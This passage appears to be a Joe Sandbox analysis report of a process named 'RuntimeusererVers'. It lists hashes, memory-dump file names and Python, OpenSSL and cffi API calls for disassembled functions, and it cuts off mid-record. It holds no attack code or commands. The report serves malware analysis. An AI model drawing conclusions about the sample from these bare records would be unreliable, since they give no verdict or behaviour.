                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cb6b992dccc0bbbd35eec4e552fa07fff812e8ade9aaf94e67c5b67c9c866cbb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71214A32A09F4285EB698F15AC601B973A4FB48FE4B184234DE4E52B64DF3DF452C304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Eval_Thread$O_free_allRestoreSave
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 86175192-0
                                                                                                                                                                                                                                          • Opcode ID: e9b91b56999810b50de280a47fa773bcc7bb804a27fefe3f2ba923a05619608d
                                                                                                                                                                                                                                          • Instruction ID: b37f9dcd81ce3e7d03215ae4258649774a869298afc967f25f6462c3f998f627
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9b91b56999810b50de280a47fa773bcc7bb804a27fefe3f2ba923a05619608d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A311A8B6E19E0292FA598B61DA5837C27A4FB48BB6F540334CA0E46950CF3DF4A58300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • EVP_MD_CTX_copy.LIBCRYPTO-1_1(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E29E5
                                                                                                                                                                                                                                          • PyThread_acquire_lock.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E2A08
                                                                                                                                                                                                                                          • PyThread_release_lock.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E2A17
                                                                                                                                                                                                                                          • PyEval_SaveThread.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E522C
                                                                                                                                                                                                                                          • PyThread_acquire_lock.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E523E
                                                                                                                                                                                                                                          • PyEval_RestoreThread.PYTHON311(?,?,00000000,00007FF81E4E27AC), ref: 00007FF81E4E5247
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lockX_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1756194536-0
                                                                                                                                                                                                                                          • Opcode ID: e18c9e7a8f582d0aae06b5a70d0e8db6711e9cf82f42f8f614a475e592bc3082
                                                                                                                                                                                                                                          • Instruction ID: 859a2b39a37dd5fce955e26c73612f0bc3ced34526c4444093d6f4a96121a41f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e18c9e7a8f582d0aae06b5a70d0e8db6711e9cf82f42f8f614a475e592bc3082
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01E525A08E4386EA548B62A8489392361AB88FF4B145631EE4E53B58DE2CF8E19340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Eval_ThreadThread_acquire_lock$RestoreSaveThread_release_lockX_copy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1756194536-0
                                                                                                                                                                                                                                          • Opcode ID: 8fff098642709bb73204b4a8ac8639e22a3ced04d8aabff8f524475106d8fc93
                                                                                                                                                                                                                                          • Instruction ID: 653ec9d43399e85a314aab272793d3acc281c1f4376784fc211e33a88b5a87e6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8fff098642709bb73204b4a8ac8639e22a3ced04d8aabff8f524475106d8fc93
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501D625B09F4382EB45CB62A9585296360BF98FE0F085230DE0E43B55CE3CF4F58700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_free
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2268491255-0
                                                                                                                                                                                                                                          • Opcode ID: 6493352eb6d6ed3341580a2395efd01224b6157228b4c69fa8689b251ece88ee
                                                                                                                                                                                                                                          • Instruction ID: 4110f41b348da2571ca55ea3309685679a96d6e8defab444d89cd1db6c77acf9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6493352eb6d6ed3341580a2395efd01224b6157228b4c69fa8689b251ece88ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F011E72A18E8581DF44AF61D9916BC63A4FFD1BD8F080239EF4D4B697CF24E4918329
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$Value$malloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2897262332-0
                                                                                                                                                                                                                                          • Opcode ID: a003b3710e9280e7628921405b2e4fb77e8b0aee88261c2af85ecdf5b62c0277
                                                                                                                                                                                                                                          • Instruction ID: b4d2429596d7126b0bf13ab63a5da45e679dd6769f3ecc73a93ea51544dec85b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a003b3710e9280e7628921405b2e4fb77e8b0aee88261c2af85ecdf5b62c0277
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57F0C935A59E06C7E71D9F21DC642B87360BF58BA5F454638CA1E0A3A0FE3D7984C710
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E50A740: PyErr_Occurred.PYTHON311(?,?,00000000,00007FF81E50ABE1,?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50A7C7
                                                                                                                                                                                                                                            • Part of subcall function 00007FF81E50A740: PyErr_Occurred.PYTHON311(?,?,00000000,00007FF81E50ABE1,?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50A851
                                                                                                                                                                                                                                          • PyObject_Malloc.PYTHON311(?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50AC01
                                                                                                                                                                                                                                          • PyErr_NoMemory.PYTHON311(?,?,?,?,?,?,?,?,?,00007FF81E507143), ref: 00007FF81E50AC0F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Occurred$MallocMemoryObject_
                                                                                                                                                                                                                                          • String ID: libffi failed to build this function type
                                                                                                                                                                                                                                          • API String ID: 3589106435-1453035256
                                                                                                                                                                                                                                          • Opcode ID: 87b1179e8c9070b76f2cee160d7cd1aacfab705e6ae279e179b59d550c482406
                                                                                                                                                                                                                                          • Instruction ID: e3e438973b8b78a952f03a2bcb1e57b4fd571921a2920be4b1f9d898584c59b2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87b1179e8c9070b76f2cee160d7cd1aacfab705e6ae279e179b59d550c482406
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1412C72A18F41C6EB558F25E8202A977A0FB88BE4F448235FB4D87795EF3CE9508740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: O_ctrlmemcpy
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem_lib.c$TLS 1.3, client CertificateVerify$TLS 1.3, server CertificateVerify
                                                                                                                                                                                                                                          • API String ID: 2266715306-2608420995
                                                                                                                                                                                                                                          • Opcode ID: 15aa47485ae97e114c81045a7148ccf703e01fe5c933243fd750f331446eba2e
                                                                                                                                                                                                                                          • Instruction ID: 912e58e71ebd35f8a3ee5290b0befa915ccf8b1de91653f84ecbdb6161e3c3ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15aa47485ae97e114c81045a7148ccf703e01fe5c933243fd750f331446eba2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90416D32A08E8286EB10CF15D4402BD77A0FB95BD8F558232EB8D87A95DF29E5A5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • global variable '%.200s' should be %zd bytes according to the cdef, but is actually %zd, xrefs: 00007FF81E518435
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$Err_Format$Dict_Item
                                                                                                                                                                                                                                          • String ID: global variable '%.200s' should be %zd bytes according to the cdef, but is actually %zd
                                                                                                                                                                                                                                          • API String ID: 3830123900-276371364
                                                                                                                                                                                                                                          • Opcode ID: 1fc1faa2231e69d6ddf959b60745bc6fef0caa2df607a8e902fa608ff2d7a52a
                                                                                                                                                                                                                                          • Instruction ID: f8d0161717e3bac82b54c152d6f25043f49558d1e2baa89a2c9bc4cec7aa5b3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fc1faa2231e69d6ddf959b60745bc6fef0caa2df607a8e902fa608ff2d7a52a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9121AF22E09E4681EA659B569D606FAA3A1EF49FF4F094636CE0D57384EF3CF8418340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$_strtoui64
                                                                                                                                                                                                                                          • String ID: float$number too large
                                                                                                                                                                                                                                          • API String ID: 3513630032-3713550434
                                                                                                                                                                                                                                          • Opcode ID: 2d8f2bafc7c4374692fc6476e9960b37fae3488a7c7fa695c509609faea86466
                                                                                                                                                                                                                                          • Instruction ID: 59c99887b37c61de7c5f83000ab914901551ce3381a36b8fdd97c203974ad3a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d8f2bafc7c4374692fc6476e9960b37fae3488a7c7fa695c509609faea86466
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB215E72B18E4586EB658B28D8242B937A1FB45BF4F414332CAAD426D4DF7CE885C611
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _errno$_strtoui64
                                                                                                                                                                                                                                          • String ID: long$number too large
                                                                                                                                                                                                                                          • API String ID: 3513630032-2213527609
                                                                                                                                                                                                                                          • Opcode ID: 083238e567f071c7bdc197356764eafc0b6152f45a385f273b77d02ab789142d
                                                                                                                                                                                                                                          • Instruction ID: da0fbfcdb7e8b32bb553971b9c79fb6b484be5b2e5bd61ebeea055de5751fbaf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 083238e567f071c7bdc197356764eafc0b6152f45a385f273b77d02ab789142d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E216D72B08F4686EB658B28D8242B927A1FB45FF4F404732CAAD426D8DF7CF485C601
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc
                                                                                                                                                                                                                                          • String ID: an integer is required$integer conversion failed
                                                                                                                                                                                                                                          • API String ID: 3617616757-1846422268
                                                                                                                                                                                                                                          • Opcode ID: 5aa4f47f9dcc583b00b275e1175f96e56824d0b51310509d99daddc91ce13d05
                                                                                                                                                                                                                                          • Instruction ID: 50f6b651b0adc059f17d0051f3517d8cedb7288bd32fd61ade114151dbd626bc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5aa4f47f9dcc583b00b275e1175f96e56824d0b51310509d99daddc91ce13d05
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C1214F32B09E46D1EA588B16ED602B963A0EF48BF4F085331EE2D077D5DE2DF4548300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Unicode_$DeallocFormatFromObject_Repr
                                                                                                                                                                                                                                          • String ID: <cdata '%s' %s %s>
                                                                                                                                                                                                                                          • API String ID: 3526755465-1199376545
                                                                                                                                                                                                                                          • Opcode ID: f60472220e85925729e381a9361b877bef2b87bbc2c03646548431fd92b93622
                                                                                                                                                                                                                                          • Instruction ID: ea377fb62aef37326722c2ec6fc49880b844d9b47fdd2c2649cc56414b1489e6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f60472220e85925729e381a9361b877bef2b87bbc2c03646548431fd92b93622
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7F04421B19F8282DA588B56FD541B96360FF88FE9B085231EE5E17B19DF3CF4918700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: D_do_allDeallocFrozenModule_ObjectSet_
                                                                                                                                                                                                                                          • String ID: openssl_md_meth_names
                                                                                                                                                                                                                                          • API String ID: 3817856336-1600430994
                                                                                                                                                                                                                                          • Opcode ID: 95b020f283c932e59611cbc93bac2c419a1e03bca78a33516f4fbd017d991d2e
                                                                                                                                                                                                                                          • Instruction ID: dee8bb5966c22de41f5623a4a7f0e10254621932a4bba1e1904e52a54036888f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95b020f283c932e59611cbc93bac2c419a1e03bca78a33516f4fbd017d991d2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1901FB31A18E0396EB219B20A8046796360FF487F5F541335D95E46A94DF7CF5E5C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Next$ErrorFatalFunc
                                                                                                                                                                                                                                          • String ID: _cffi_backend: get_field_name()$get_field_name
                                                                                                                                                                                                                                          • API String ID: 3667637998-2451131939
                                                                                                                                                                                                                                          • Opcode ID: b1251c3d43b44a53bfc0ee7d41cb011815fcd451857355792c59530de86146e3
                                                                                                                                                                                                                                          • Instruction ID: 8790a5a79a8d71b51238f5c2b9b786a42746154e375846621a0da3e368f00c66
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b1251c3d43b44a53bfc0ee7d41cb011815fcd451857355792c59530de86146e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF015A62618E8792DA08CF15E8502EA6330FB88BD4F500232E78D47928DF7EE559CB40
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$BufferContiguousErr_Object_ReleaseString
